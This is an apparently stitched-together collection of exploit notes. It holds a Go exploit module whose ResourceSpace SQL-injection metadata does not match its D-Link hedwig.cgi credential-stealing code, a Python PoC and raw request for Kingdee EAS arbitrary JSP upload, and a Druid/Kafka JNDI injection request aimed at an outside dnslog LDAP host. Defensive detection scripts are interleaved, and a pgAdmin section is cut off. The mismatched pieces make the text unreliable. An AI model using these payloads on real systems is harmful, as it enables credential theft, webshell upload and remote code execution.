"Description": "<p>Montala ResourceSpace是英国Montala公司的一种开源数字资产管理工具。<br></p><p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">ResourceSpace 9.5 以及之前版本&nbsp;add_keyword.php 文件的 k 参数存在 sql 注入漏洞。攻击者可以获取ResourceSpace数据库的全部内容,包括用户会话cookie。</span><br></p>",
"Recommendation": "<p>厂商已发布解决方案,请更新到最新版本:<a href=\"https://www.resourcespace.com/get\" target=\"_blank\">https://www.resourcespace.com/get</a><br></p>",
"Impact": "<p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">该漏洞允许攻击者获取 ResourceSpace 数据库的完整内容,包括用户会话 cookie。</span><br></p>",
"VulType": [
"SQL注入"
],
"Tags": []
},
"EN": {
"Name": "ResourceSpace add_keyword.php k SQL Injection Vulnerability (CVE-2021-41765)",
"Product": "ResourceSpace",
"Description": "<p>Montala ResourceSpace is an open source digital asset management tool from Montala, UK.<br></p><p>SQL injection vulnerability exists in the k parameter of the add_keyword.php file in ResourceSpace 9.5 and earlier versions. An attacker can obtain the entire contents of the ResourceSpace database, including user session cookies.<br></p>",
"Recommendation": "<p>The manufacturer has released a solution, please update to the latest version: <a href=\"https://www.resourcespace.com/get\" target=\"_blank\">https://www.resourcespace.com/get</a><br></p>",
"Impact": "<p>This vulnerability allows an attacker to obtain the complete content of the ResourceSpace database, including user session cookies.<br></p>",
"VulType": [
"SQL Injection"
],
"Tags": []
}
},
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}`
getUserPasswordFlaggdshjab213dhjas := func(hostinfo *httpclient.FixUrl) (string, string, error) {
payloadRequestConfig := httpclient.NewPostRequestConfig("/hedwig.cgi")
payloadRequestConfig.VerifyTls = false
payloadRequestConfig.FollowRedirect = false
payloadRequestConfig.Header.Store("Content-Type", "text/xml")
payloadRequestConfig.Header.Store("Cookie", "uid=123")
payloadRequestConfig.Data = `<?xml version="1.0" encoding="utf-8"?><postxml><module><service>../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml</service></module></postxml>`
resp, err := httpclient.DoHttpRequest(hostinfo, payloadRequestConfig)
if err != nil {
return "", "", err
}
if strings.Contains(resp.Utf8Html, "==OoXxGgYy==") {
return "", "", errors.New("漏洞利用失败")
}
ldapAmavisPasswordMatchResult := regexp.MustCompile(`<password>(.*?)</password>`).FindStringSubmatch(resp.Utf8Html)
if len(ldapAmavisPasswordMatchResult) < 2 {
return "", "", errors.New("漏洞利用失败")
}
usernameMatchResult := regexp.MustCompile(`<name>(.*?)</name>`).FindStringSubmatch(resp.Utf8Html)
if len(usernameMatchResult) < 2 {
return "", "", errors.New("漏洞利用失败")
}
username := usernameMatchResult[1]
password := ldapAmavisPasswordMatchResult[1]

return username, password, nil
}
//getUserPasswordFlaggdshjab213dhjas := func(hostinfo *httpclient.FixUrl) (*httpclient.HttpResponse, error) {
// payloadRequestConfig := httpclient.NewPostRequestConfig("/hedwig.cgi")
// payloadRequestConfig.VerifyTls = false
// payloadRequestConfig.FollowRedirect = false
// payloadRequestConfig.Header.Store("Content-Type", "text/xml")
// payloadRequestConfig.Header.Store("Cookie", "uid=123")
// payloadRequestConfig.Data = `<?xml version="1.0" encoding="utf-8"?><postxml><module><service>../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml</service></module></postxml>`
// return httpclient.DoHttpRequest(hostinfo, payloadRequestConfig)
//}
ExpManager.AddExploit(NewExploit(
goutils.GetFileName(),
expJson,
func(exp *jsonvul.JsonVul, hostInfo *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {
_, _, err := getUserPasswordFlaggdshjab213dhjas(hostInfo)
return err == nil
},
func(expResult *jsonvul.ExploitResult, stepLogs *scanconfig.SingleScanConfig) *jsonvul.ExploitResult {
attackType := goutils.B2S(stepLogs.Params["attackType"])
if attackType == "password" {
username, password, err := getUserPasswordFlaggdshjab213dhjas(expResult.HostInfo)
if err != nil {
expResult.Output = err.Error()
} else {
expResult.Success = true
expResult.Output = "username: " + username + "\n" + "password: " + password
}
}
return expResult
},
))
}


Kingdee EAS myUploadFile.do arbitrary file upload

POC written by someone else

# -*- coding: utf-8 -*-
import urllib.request
import sys
if __name__=="__main__":
    if(len(sys.argv)<2):
        print("usage: python3 test.py http://xx.x.x.x:6888")
    else:
        url=sys.argv[1]
        target=url+"/easportal/buffalo/%2e%2e/cm/myUploadFile.do"
        datastr="----WebKitFormBoundarydSvxXKRkrZuWduJl\r\nContent-Disposition: form-data; name=\"myFile\"; filename=\"h2.jsp\"\r\nContent-Type: image/plain\r\n\r\n<%out.println(\"Your IP address is \" + request.getRemoteAddr());%>\r\n----WebKitFormBoundarydSvxXKRkrZuWduJl--"
        headers = { "User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0","Referer":"http://yunzhijia.com","Content-Type":"multipart/form-data; boundary=--WebKitFormBoundarydSvxXKRkrZuWduJl"}
        req =urllib.request.Request(url=target,headers=headers,data=bytes(datastr, encoding='utf-8'))
        page = urllib.request.urlopen(req)
        if(page.status==200):
            print("文件上传成功:"+url+"/easportal/buffalo/%2e%2e/h2.jsp")
        else:
            print("文件上传失败")
            print(page.status)

The request as sent on the wire

POST /easportal/buffalo/%2e%2e/cm/myUploadFile.do HTTP/1.1
Accept-Encoding: gzip, deflate
Content-Length: 242
Host: wp.zssp.top:6888
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Referer: http://yunzhijia.com
Content-Type: multipart/form-data; boundary=--WebKitFormBoundarydSvxXKRkrZuWduJl
Connection: close

----WebKitFormBoundarydSvxXKRkrZuWduJl
Content-Disposition: form-data; name="myFile"; filename="h2.jsp"
Content-Type: image/plain

<%out.println("Your IP address is " + request.getRemoteAddr());%>
----WebKitFormBoundarydSvxXKRkrZuWduJl--
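Both the EAS request above (a `%2e%2e` segment in the URI that steps out of `/easportal/buffalo/` into `/cm/`) and the hedwig.cgi module earlier (a `../../../` prefix inside the `<service>` element of the postxml body) are directory traversal; one hides behind percent-encoding, the other sits in a request body where a URL-only filter never looks. The following added example (not code from the page or from either vendor) decodes and normalizes the path, and parses the XML body, before deciding; the expected path prefixes and the sample requests are constructed for this example.

```python
"""Spot directory traversal hidden behind percent-encoding in a URI or placed
inside a request body. Added example; sample requests are constructed and the
expected path prefixes are assumptions."""
import posixpath
import xml.etree.ElementTree as ET
from urllib.parse import unquote


def decode_fully(value: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly so double-encoded %252e%252e is caught too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def path_escapes(expected_prefix: str, raw_path: str) -> bool:
    """True if the request path, once decoded and normalized, leaves expected_prefix
    (or carries any '..' segment at all, which a normal client never sends)."""
    decoded = decode_fully(raw_path)
    normalized = posixpath.normpath(decoded)
    return ".." in decoded.split("/") or not normalized.startswith(expected_prefix)


def hedwig_service_traversal(xml_body: str) -> list:
    """Return the <service> values in a hedwig.cgi postxml body that reach outside
    the service directory (relative '..' segments or an absolute path)."""
    try:
        root = ET.fromstring(xml_body)
    except ET.ParseError:
        return []
    bad = []
    for svc in root.iter("service"):
        text = decode_fully((svc.text or "").strip())
        if ".." in text.split("/") or text.startswith("/"):
            bad.append(text)
    return bad


def inspect_request(raw_path: str, body: str = "", expected_prefix: str = "/") -> list:
    """Combine both checks for one request and return the list of findings."""
    findings = []
    if path_escapes(expected_prefix, raw_path):
        findings.append("traversal in request path: " + raw_path)
    if raw_path.split("?")[0].endswith("/hedwig.cgi"):
        for svc in hedwig_service_traversal(body):
            findings.append("traversal in <service>: " + svc)
    return findings


# Constructed samples modelled on the two requests shown on this page.
EAS_PATH = "/easportal/buffalo/%2e%2e/cm/myUploadFile.do"
HEDWIG_BODY = ('<?xml version="1.0" encoding="utf-8"?><postxml><module>'
               '<service>../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml</service>'
               '</module></postxml>')

if __name__ == "__main__":
    print(inspect_request(EAS_PATH, expected_prefix="/easportal/buffalo/"))
    print(inspect_request("/hedwig.cgi", HEDWIG_BODY))
```

The `expected_prefix` check is the part that makes the rule robust: a reverse proxy that only blocks the literal string `../` misses `%2e%2e`, and one that decodes once misses `%252e`, but comparing the normalized path against the prefix the handler is allowed to serve catches every encoding.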

Apache Kafka Connect JNDI injection vulnerability (CVE-2023-25194)

Environment setup

Source download: https://codeload.github.com/apache/druid/zip/druid-0.19.0

Binary download: https://archive.apache.org/dist/druid/0.19.0/apache-druid-0.19.0-bin.tar.gz

1. Set up debugging

Edit this file

vim /apache-druid-0.19.0/conf/druid/single-server/micro-quickstart/coordinator-overlord/jvm.config

Append it at the end

-Xdebug -Xnoagent -Djava.compiler=NONE -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=5005

2. Start

./start-micro-quickstart


Docker setup

I didn't set up debugging for this one!

sudo docker pull vulhub/apache-druid:25.0.0
sudo docker run -d -p 8882:8888 vulhub/apache-druid:25.0.0

Introduction to Kafka

Apache Kafka is a distributed data store optimized for ingesting and processing streaming data in real time. Streaming data is data generated continuously by thousands of data sources, which typically send their records at the same time. A streaming platform has to handle this constant inflow and process it sequentially and incrementally.

Kafka provides three main functions to its users:

  • Publish and subscribe to streams of records
  • Store streams of records efficiently, in the order they were generated
  • Process streams of records in real time

Let me give two simple examples: if you subscribe to an account, you can read its new articles as soon as they are published; and on Douyin you get a notification when someone you follow posts a new video, so you can browse the new content right away.

Vulnerable feature

Vulnerability POC

POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
Host: 172.16.30.44:8882
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 1367
Content-Type: application/json
Accept-Encoding: gzip, deflate
Connection: close

{
"type":"kafka",
"spec":{
"type":"kafka",
"ioConfig":{
"type":"kafka",
"consumerProperties":{
"bootstrap.servers":"127.0.0.1:6666",
"sasl.mechanism":"SCRAM-SHA-256",
"security.protocol":"SASL_SSL",
"sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://ldap://n847zu.dnslog.cn\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
},
"topic":"test",
"useEarliestOffset":true,
"inputFormat":{
"type":"regex",
"pattern":"([\\s\\S]*)",
"listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965",
"columns":[
"raw"
]
}
},
"dataSchema":{
"dataSource":"sample",
"timestampSpec":{
"column":"!!!_no_such_column_!!!",
"missingValue":"1970-01-01T00:00:00Z"
},
"dimensionsSpec":{

},
"granularitySpec":{
"rollup":false
}
},
"tuningConfig":{
"type":"kafka"
}
},
"samplerConfig":{
"numRows":500,
"timeoutMs":15000
}
}
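The whole PoC reduces to one field: the spec's `consumerProperties` are handed to the Kafka client as-is, so `sasl.jaas.config` can name `com.sun.security.auth.module.JndiLoginModule` and point `user.provider.url` at an LDAP server the caller controls, and the JNDI lookup happens when the consumer authenticates. The following added example (not code from the page, Druid or Kafka) walks a submitted spec and flags exactly those two conditions, which is what an ingestion gateway or log-review script should check; the sample specs are constructed from the PoC body above, with a placeholder LDAP host.

```python
"""Inspect a Druid Kafka ingestion/sampler spec and flag consumer properties that
let the caller choose a JAAS login module and aim it at a JNDI URL (the
CVE-2023-25194 pattern). Added example; sample specs are constructed."""
import json
import re

# Login modules a client-supplied sasl.jaas.config must never name. Kafka 3.4.0
# added the system property org.apache.kafka.disallowed.login.modules and
# disallows JndiLoginModule by default; older clients accept any module.
DISALLOWED_LOGIN_MODULES = {
    "com.sun.security.auth.module.JndiLoginModule",
}
JNDI_SCHEME_RE = re.compile(r"^(?:ldap|ldaps|rmi|dns|iiop)://", re.IGNORECASE)
# JAAS options look like  key="value"; we only care about *provider.url keys.
PROVIDER_URL_RE = re.compile(r'([\w.]+provider\.url)\s*=\s*"([^"]*)"')


def find_consumer_properties(node):
    """Yield every dict found under a 'consumerProperties' key, at any depth."""
    if isinstance(node, dict):
        for key, value in node.items():
            if key == "consumerProperties" and isinstance(value, dict):
                yield value
            yield from find_consumer_properties(value)
    elif isinstance(node, list):
        for item in node:
            yield from find_consumer_properties(item)


def inspect_kafka_spec(body: str) -> list:
    """Return findings for one spec body; an empty list means nothing suspicious."""
    try:
        spec = json.loads(body)
    except ValueError:
        return []
    findings = []
    for props in find_consumer_properties(spec):
        jaas = str(props.get("sasl.jaas.config", ""))
        # JAAS syntax: "<LoginModuleClass> <flag> key="value" ...;"
        module = jaas.split(None, 1)[0] if jaas.strip() else ""
        if module in DISALLOWED_LOGIN_MODULES:
            findings.append("disallowed login module: " + module)
        for key, url in PROVIDER_URL_RE.findall(jaas):
            if JNDI_SCHEME_RE.match(url.strip()):
                findings.append(key + " points at JNDI URL " + url)
    return findings


# Constructed from the PoC body above; ldap://attacker.example stands in for the dnslog host.
SAMPLE_ATTACK_SPEC = json.dumps({
    "type": "kafka",
    "spec": {"type": "kafka", "ioConfig": {"type": "kafka", "consumerProperties": {
        "bootstrap.servers": "127.0.0.1:6666",
        "sasl.mechanism": "SCRAM-SHA-256",
        "security.protocol": "SASL_SSL",
        "sasl.jaas.config": 'com.sun.security.auth.module.JndiLoginModule required '
                            'user.provider.url="ldap://attacker.example" useFirstPass="true" '
                            'serviceName="x" debug="true" group.provider.url="xxx";',
    }, "topic": "test"}},
    "samplerConfig": {"numRows": 500, "timeoutMs": 15000},
})
# A normal SCRAM login for comparison.
SAMPLE_BENIGN_SPEC = json.dumps({
    "type": "kafka",
    "spec": {"ioConfig": {"consumerProperties": {
        "bootstrap.servers": "kafka.internal:9092",
        "sasl.mechanism": "SCRAM-SHA-256",
        "sasl.jaas.config": 'org.apache.kafka.common.security.scram.ScramLoginModule '
                            'required username="ingest" password="secret";',
    }}},
})

if __name__ == "__main__":
    print(inspect_kafka_spec(SAMPLE_ATTACK_SPEC))
    print(inspect_kafka_spec(SAMPLE_BENIGN_SPEC))
```

The module check and the URL check are deliberately independent: the PoC uses both, but a spec that only ships a JNDI URL into some other option, or only names the module with a local provider, still deserves a look. On the Kafka side the durable fix is the client upgrade plus `-Dorg.apache.kafka.disallowed.login.modules`; on the Druid side it is not exposing the sampler endpoint to callers who are allowed to supply arbitrary consumer properties.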


Vulnerability analysis

Enter the container

sudo docker exec -it bdb513518b4f /bin/bash

Install basic tools

apt update
apt install net-tools vim

tail -f coordinator-overlord.log

References

https://www.anquanke.com/post/id/235831#:~:text=CVE-2021-25646%20Apache%20Druid%20%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%201%20%E5%89%8D%E7%BD%AE%E7%9F%A5%E8%AF%86%20Druid%20Apache,post%20%E6%9E%84%E9%80%A0%E4%B8%80%E4%B8%AAfiliter%EF%BC%8C%E5%B0%B1%E5%8F%AF%E4%BB%A5%E5%AE%8C%E6%88%90RCE%E4%BA%86%2C%20...%205%20%E4%BF%AE%E5%A4%8D%E6%80%9D%E8%B7%AF%20%E5%AE%98%E6%96%B9%E7%9A%84%E4%BF%AE%E5%A4%8D%E6%80%9D%E8%B7%AF%E6%98%AF%E5%9C%A8%E4%BB%BB%E4%BD%95%E6%83%85%E5%86%B5%E4%B8%8B%E9%83%BD%E4%B8%8D%E5%85%81%E8%AE%B8%E7%A9%BA%E9%94%AE%E5%80%BC%E8%A2%AB%E4%BC%A0%E5%85%A5%E8%B5%8B%E5%80%BC%EF%BC%8C%E9%87%8D%E5%86%99%E4%BA%86%E6%96%B9%E6%B3%95%20findPropertyIgnorals%20

pgAdmin4 <= 8.4 post-authentication remote command execution vulnerability (CVE-2024-3116)

Download pgAdmin4 version 8.4; installation is straightforward, just keep clicking Next.


Install a Python environment; I installed Python 3.8.

Vulnerability reproduction